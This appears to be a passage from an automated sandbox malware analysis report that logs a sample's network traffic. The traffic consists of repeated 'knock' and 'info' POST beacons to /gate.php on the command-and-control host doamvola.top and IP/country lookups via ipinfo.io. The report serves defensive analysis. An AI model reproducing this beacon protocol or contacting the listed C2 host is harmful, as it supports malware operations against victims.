Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 342Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 342Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 342Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 342Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 342Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 342Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 342Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 342Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 342Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 342Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 342Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 342Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 342Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 342Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 342Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 342Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 342Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 0Host: doamvola.top
May check the online IP address of the machineShow sources
Source: unknownDNS query: name: ipinfo.io
Source: unknownDNS query: name: ipinfo.io
Source: unknownDNS query: name: ipinfo.io
Source: unknownDNS query: name: ipinfo.io
Source: unknownDNS query: name: ipinfo.io
Source: unknownDNS query: name: ipinfo.io
Source: unknownDNS query: name: ipinfo.io
Source: unknownDNS query: name: ipinfo.io
Source: Joe Sandbox ViewIP Address: 216.239.34.21 216.239.34.21
Source: Joe Sandbox ViewIP Address: 151.101.0.133 151.101.0.133
Source: Joe Sandbox ViewIP Address: 216.239.36.21 216.239.36.21
Source: Joe Sandbox ViewASN Name: SELECTELRU SELECTELRU
Source: Joe Sandbox ViewASN Name: GOOGLEUS GOOGLEUS
Source: Joe Sandbox ViewASN Name: FASTLYUS FASTLYUS
Source: Joe Sandbox ViewJA3 fingerprint: ce5f3254611a8c095a3d821d44539877
Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: ipinfo.io
Source: global trafficHTTP traffic detected: GET /country HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: ipinfo.io
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 342Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 342Host: doamvola.top
Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: ipinfo.io
Source: global trafficHTTP traffic detected: GET /country HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: ipinfo.io
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 342Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 342Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 342Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 342Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 342Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 342Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 342Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 342Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 342Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 342Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 342Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 342Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 342Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 342Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 342Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 342Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 342Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 342Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 342Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 342Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 0Host: doamvola.top
